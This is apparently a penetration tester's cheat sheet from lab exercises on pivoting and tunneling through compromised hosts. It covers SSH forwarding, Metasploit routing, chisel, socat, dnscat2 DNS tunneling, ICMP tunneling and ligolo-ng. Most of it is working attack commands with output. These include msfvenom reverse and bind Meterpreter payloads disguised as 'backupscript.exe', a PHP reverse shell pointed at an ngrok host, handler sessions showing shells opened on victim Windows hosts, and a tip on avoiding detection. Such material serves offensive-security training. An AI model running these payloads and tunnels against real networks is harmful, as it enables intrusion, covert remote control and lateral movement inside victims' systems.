Pivot, Tunneling and Port Forwarding
SSH
Local port forwarding
Mysql port 3306 on victim localhost: netstat -tulpn
ssh -L 1234:localhost:3306 ubuntu@10.129.202.64The -L command tells the SSH client to request the SSH server to forward all the data we send via the port 1234 to localhost:3306 on the Ubuntu server.
$ nmap -v -sV -p1234 localhost
PORT STATE SERVICE VERSION
1234/tcp open mysql MySQL 8.0.28-0ubuntu0.20.04.3Web server listening on localhost
user@box:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33209 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:37285 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:43765 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::21 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* - 127.0.0.1:8080ssh -L 8888:localhost:8080 user@box.htb
Forwarding multiple ports
ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64Dynamic Port Forwarding with SSH
ssh -D 9050 ubuntu@10.129.202.64$ tail -4 /etc/proxychains.conf
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050proxychains nmap -v -sn 172.16.5.1-200- sT
proxychains nmap -v -Pn -sT 172.16.5.19Remote / reverse port forward
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ourIP> -vNAttacker host
Create user
sudo adduser tunnel
sudo usermod -aG sudo tunnelConfigue SSH Server
vim /etc/ssh/sshd_configAdd
PasswordAuthentication yes
AllowUsers tunnel
Port 2222Restart SSH Server
sudo systemctl restart sshdor inside a Docker
[Jan 18, 2025 - 03:43:07 (EST)] exegol-default /workspace # sudo mkdir -p /run/sshd
[Jan 18, 2025 - 03:43:44 (EST)] exegol-default /workspace # sudo chmod 0755 /run/sshd
[Jan 18, 2025 - 03:43:52 (EST)] exegol-default /workspace # /usr/sbin/sshd
[Jan 18, 2025 - 03:43:58 (EST)] exegol-default /workspace # service ssh status
sshd is running.2 - On victim - Connect to our host
ssh tunnel@10.8.1.254 -R 1080 -p 2222 -N
Attacker host:
# proxychains nmap -p 389,445 -Pn 172.16.41.14 -sTWinSSH
Metasploit
MSF's SOCKS Proxy
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
SRVPORT => 9050
msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 9050 yes The port to listen on
VERSION 4a yes The SOCKS version to use (Accepted: 4a,
5)
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy serverproxychains:
socks4 127.0.0.1 9050Autoroute
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
SUBNET => 172.16.5.0
msf6 post(multi/manage/autoroute) > run
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[*] Running module against 10.129.202.64
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.129.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 172.16.5.0/255.255.254.0 from host's routing table.
[*] Post module execution completedor
meterpreter > run autoroute -s 172.16.5.0/23
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.16.5.0/255.255.254.0...
[+] Added route to 172.16.5.0/255.255.254.0 via 10.129.202.64
[*] Use the -p option to list all active routesListing autoroute
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.129.0.0 255.255.0.0 Session 1
172.16.4.0 255.255.254.0 Session 1
172.16.5.0 255.255.254.0 Session 1test
proxychains nmap 172.16.5.19 -p3389 -sT -v -PnMSF local port forward
meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19
[*] Local TCP relay created: :3300 <-> 172.16.5.19:3389The above command requests the Meterpreter session to start a listener on our attack host's local port (-l) 3300 and forward all the packets to the remote (-r) Windows server 172.16.5.19 on 3389 port (-p) via our Meterpreter session.
xfreerdp /v:localhost:3300 /u:victor /p:pass@123Meterpreter Reverse Port Forwarding
meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.14.18
[*] Local TCP relay created: 10.10.14.18:8081 <-> :1234meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 8081
LPORT => 8081
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:8081 We can now create a reverse shell payload that will send a connection back to our Ubuntu server on 172.16.5.129:1234 when executed on our Windows host. Once our Ubuntu server receives this connection, it will forward that to attack host's ip:8081 that we configured.
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=1234
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: backupscript.exe[*] Started reverse TCP handler on 0.0.0.0:8081
[*] Sending stage (200262 bytes) to 10.10.14.18
[*] Meterpreter session 2 opened (10.10.14.18:8081 -> 10.10.14.18:40173 ) at 2022-03-04 15:26:14 -0500
meterpreter > shell
Process 2336 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\>Resources
Proxychains
proxychains -q <cmd> : quiet mode
Nmap over proxychains: proxychains -q nmap -sT IP PORT
tun2socks
Chisel
Socks4
user@box:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN - # ./chisel server -v -p 1234 --reverse user@box:/tmp$ ./chisel client 10.10.14.136:1234 R:8080:127.0.0.1:8080# proxychains curl http://127.0.0.1:8080proxychains not working - try without proxychains
# curl http://127.0.0.1:8080
<!DOCTYPE html>
<html lang="en" data-bs-theme="light">
<head>
<--SNIP-->Socks5
0xss0rz@htb[/htb]$ cat /etc/proxychains.conf
<SNIP>
[ProxyList]
socks5 127.0.0.1 10800xss0rz@htb[/htb]$ wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz
0xss0rz@htb[/htb]$ gzip -d chisel_1.7.7_linux_amd64.gz
0xss0rz@htb[/htb]$ mv chisel_* chisel && chmod +x ./chisel
0xss0rz@htb[/htb]$ sudo ./chisel server --reverse
2022/10/10 07:26:15 server: Reverse tunneling enabled
2022/10/10 07:26:15 server: Fingerprint 58EulHjQXAOsBRpxk232323sdLHd0r3r2nrdVYoYeVM=
2022/10/10 07:26:15 server: Listening on http://0.0.0.0:8080C:\htb> c:\tools\chisel.exe client 10.10.14.33:8080 R:socks
2022/10/10 06:34:19 client: Connecting to ws://10.10.14.33:8080
2022/10/10 06:34:20 client: Connected (Latency 125.6177ms)or choose an other port
./chisel server -v -p 1234 --socks5Socat
Socat Reverse shell
On pivot host
ubuntu@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80Socat will listen on localhost on port 8080 and forward all the traffic to port 80 on our attack host (10.10.14.18).
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 80
lport => 80
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://0.0.0.0:80[!] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Without a database connected that payload UUID tracking will not work!
[*] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Staging x64 payload (201308 bytes) ...
[!] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.10.14.18:80 -> 127.0.0.1 ) at 2022-03-07 11:08:10 -0500
meterpreter > getuid
Server username: INLANEFREIGHT\victorSocat Bind shell
$ msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 499 bytes
Final size of exe file: 7168 bytes
Saved as: backupjob.exesocat bind shell listener, which listens on port 8080 and forwards packets to Windows server 8443.
On pivot machine:
ubuntu@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set RHOST 10.129.202.64
RHOST => 10.129.202.64
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 10.129.202.64:8080[*] Sending stage (200262 bytes) to 10.129.202.64
[*] Meterpreter session 1 opened (10.10.14.18:46253 -> 10.129.202.64:8080 ) at 2022-03-07 12:44:44 -0500
meterpreter > getuid
Server username: INLANEFREIGHT\victorPlink
If the host is older and PuTTY is present (or we can find a copy on a file share), Plink can be our path to victory. We can use it to create our pivot and potentially avoid detection a little longer.
plink -ssh -D 9050 ubuntu@10.129.15.50Proxifier can be used to start a SOCKS tunnel via the SSH session we created.
Portable version :
SSHuttle
removes the need to configure proxychains. However, this tool only works for pivoting over SSH and does not provide other options for pivoting
sudo apt-get install sshuttlesudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v Rpivot
sudo git clone https://github.com/klsecservices/rpivot.gitsudo apt-get install python2.7python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/run client from pivot machine:
ubuntu@WEB01:~/rpivot$ python2.7 client.py --server-ip 10.10.14.18 --server-port 9999HTTP proxy and NTLM auth
python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>configure proxychains to pivot over our local server on 127.0.0.1:9050
proxychains firefox-esr 172.16.5.135:80Netsh
C:\Windows\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25C:\Windows\system32> netsh.exe interface portproxy show v4tov4
Listen on ipv4: Connect to ipv4:
Address Port Address Port
--------------- ---------- --------------- ----------
10.129.42.198 8080 172.16.5.25 3389
DNScat2
DNS Tunneling
$ git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
sudo gem install bundler
sudo bundle installsudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cacheDoesn't work on Exegol => Ubuntu
sudo apt install ruby-dev
sudo apt install gem
sudo apt install ruby-rubygems
export PATH="$PATH:$HOME/.rvm/bin"
Will provide us the secret key
git clone https://github.com/lukebaggett/dnscat2-powershell.gitImport dnscat to windows victim
Set-ExecutionPolicy UnrestrictedPS C:\htb> Import-Module .\dnscat2.ps1PS C:\htb> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd 
New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
dnscat2>nscat2> ?
Here is a list of commands (use -h on any of them for additional help):
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windowsdnscat2> window -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!
That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!
To go back, type ctrl-z.
Microsoft Windows [Version 10.0.18363.1801]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
exec (OFFICEMANAGER) 1>ICMP Tunneling
git clone https://github.com/utoni/ptunnel-ng.gitsudo ./autogen.shscp -r ptunnel-ng ubuntu@10.129.202.64:~/ubuntu@WEB01:~/ptunnel-ng/src$ sudo ./ptunnel-ng -r10.129.202.64 -R22-r: attacker host
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22ssh -p2222 -lubuntu 127.0.0.1Port forward:
ssh -D 9050 -p2222 -lubuntu 127.0.0.1$ proxychains nmap -sV -sT 172.16.5.19 -p3389
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-11 11:10 EDT
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK
Nmap scan report for 172.16.5.19
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.78 secondsSocksOverRDP
Copy the SocksOverRDPx64.zip on the target
Load dll
C:\Users\htb-student\Desktop\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dllConnect to 172.16.5.19 over RDP using mstsc.exe, and we should receive a prompt that the SocksOverRDP plugin is enabled, and it will listen on 127.0.0.1:1080
We will need to transfer SocksOverRDPx64.zip or just the SocksOverRDP-Server.exe to 172.16.5.19. We can then start SocksOverRDP-Server.exe with Admin privileges.
After starting our listener, we can transfer Proxifier portable to the Windows 10 target (on the 10.129.x.x network), and configure it to forward all our packets to 127.0.0.1:1080. Proxifier will route traffic through the given host and port
Profile > Proxyserver Add 127.0.0.1 port 1080 Socks version5
With Proxifier configured and running, we can start mstsc.exe, and it will use Proxifier to pivot all our traffic via 127.0.0.1:1080, which will tunnel it over RDP to 172.16.5.19, which will then route it to 172.16.6.155 using SocksOverRDP-server.exe.
Ligolo-ng - The best tool
References
Moving pivot from different hosts
[Mar 21, 2024 - 02:16:03 (EDT)] exegol-zephyr ligolo # sudo ip tuntap add user root mode tun ligolo
[Mar 21, 2024 - 02:16:15 (EDT)] exegol-zephyr ligolo # sudo ip link set ligolo up
[Mar 21, 2024 - 02:16:30 (EDT)] exegol-zephyr ligolo # scp lin-agent riley@10.10.110.35:/tmp/0xss0rz/lin-agent
riley@10.10.110.35's password:
lin-agent 100% 4572KB 4.9MB/s 00:00
[Mar 21, 2024 - 02:20:28 (EDT)] exegol-zephyr ligolo #./lin-proxy -selfcert -laddr 0.0.0.0:443riley@mail:/tmp/0xss0rz$ chmod +x lin-agent
riley@mail:/tmp/0xss0rz$ ./lin-agent -connect 10.10.14.4:443 -ignore-certligolo-ng » INFO[0026] Agent joined. name=riley@mail remote="10.10.110.35:46489"
ligolo-ng » session
? Specify a session : 1 - #1 - riley@mail - 10.10.110.35:46489
[Agent : riley@mail] » start
[Agent : riley@mail] » INFO[0315] Starting tunnel to riley@mail[Mar 21, 2024 - 02:25:58 (EDT)] exegol-zephyr /workspace # sudo ip route add 192.168.110.0/24 dev ligoloDouble Pivot (and more)
1st Pivot
sudo ip tuntap add user root mode tun ligolosudo ip link set ligolo up./lin-proxy -selfcert -laddr 0.0.0.0:11601./lin-agent -connect 10.10.14.2:11601 -ignore-certsudo ip route add 172.16.1.0/24 dev ligolo
2nd Pivot
Create a new interface
sudo ip tuntap add user root mode tun ligolo2sudo ip link set ligolo2 up./lin-agent -connect 10.10.14.2:11601 -ignore-certstart --tun ligolo2sudo ip route add 172.16.2.0/24 dev ligolo2
3rd Pivot - the same thing (create new interface, tunnel via the new interface), if the subnet is the same, don't forget to delete old routes
sudo ip route del 172.16.2.0/24 dev ligolo2Reverse shell - File Transfer
## Shell on pivot adress (172.16.8.120)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.8.120 LPORT=1234 -f aspx > rs.aspx ## On ligolo, create listener to forward port
listener_add --addr 0.0.0.0:1234 --to 0.0.0.0:4444##On host
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcpTunnel to localhost
Bore
Ngrock
#1
./ngrok tcp 4444
#2
msfvenom -p php/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=13757 R > hack.phpLast updated